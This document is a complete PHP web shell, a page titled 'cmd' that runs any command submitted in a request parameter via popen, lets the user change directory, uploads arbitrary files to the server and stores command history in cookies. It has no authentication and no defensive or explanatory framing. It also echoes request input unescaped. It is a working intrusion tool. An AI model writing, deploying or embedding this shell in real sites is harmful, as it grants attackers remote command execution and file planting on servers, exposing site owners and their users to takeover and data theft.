<?php
if($_REQUEST['cmd'] == "" && $histcmd != "") $_REQUEST['cmd']=$histcmd;
if($_REQUEST['hist_on'] == "" && $histon != "") $_REQUEST['hist_on']=$histon;
if($_REQUEST['dir'] == "") $curdir = exec("pwd"); else $curdir = $_REQUEST['dir'];
if($_REQUEST['cmd'] == "") $curcmd = "ls -lah"; else $curcmd = $_REQUEST['cmd'];
if(($_REQUEST['upl']) == "Upload" ) {
$_REQUEST['cmd']='upload ';
if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name']))
$string = "The file has been uploaded";
else
$string = "There was an error uploading the file, please try again!";
}
if(($_REQUEST['exe']) == "Execute") {
$curcmd = "cd ".$curdir.";".$curcmd;
$f=popen($curcmd,"r");
while (!feof($f)) {
$buffer = fgets($f, 4096);
$string .= $buffer;
}
}
if ($_REQUEST['hist_on'] != 'on' ) { setcookie('hist',''); $hist=''; }
else if ($string!='') setcookie('hist',htmlspecialchars('$ '.$_REQUEST['cmd'].chr(10).$string.chr(10).$hist));
setcookie('histcmd',$_REQUEST['cmd']);setcookie('histon',$_REQUEST['hist_on']);
?>
<html><head><title>cmd</title>
<style>body,td,input,pre{font:11px Consolas;}fieldset{border:1px solid #999;}
#out{overflow:auto;height:385px;}
</style></head><body>
<pre><? print php_uname()."\n"; ?></pre>
<table><form method="post" enctype="multipart/form-data">
<tr><td>Execute command:</td><td><input name="cmd" type="text" size="100" value="<?php print $_REQUEST['cmd']; ?>" /></td><td>
<input type="radio" name="hist_on" value="on" <?php print $_REQUEST['hist_on']=='on'?'checked="checked"':'' ?>> History on
<input type="radio" name="hist_on" value="off" <?php print $_REQUEST['hist_on']=='off'?'checked="checked"':'' ?>> History off
</td>
<tr><td>Change directory:</td><td><input name="dir" type="text" size="100" value="<? print $curdir; ?>"></td>
<td><input name="exe" type="submit" value="Execute"></td></tr>
<tr><td>Upload file:</td><td><input name="fila" type="file" size="81"></td>
<td><input name="upl" type="submit" value="Upload"></td></tr></table>
<fieldset>
<pre id="out"><?php print htmlspecialchars(($string==''?'':'$ '.$_REQUEST['cmd'].chr(10).$string.chr(10)).$hist); ?>
</pre></fieldset></form></body></html>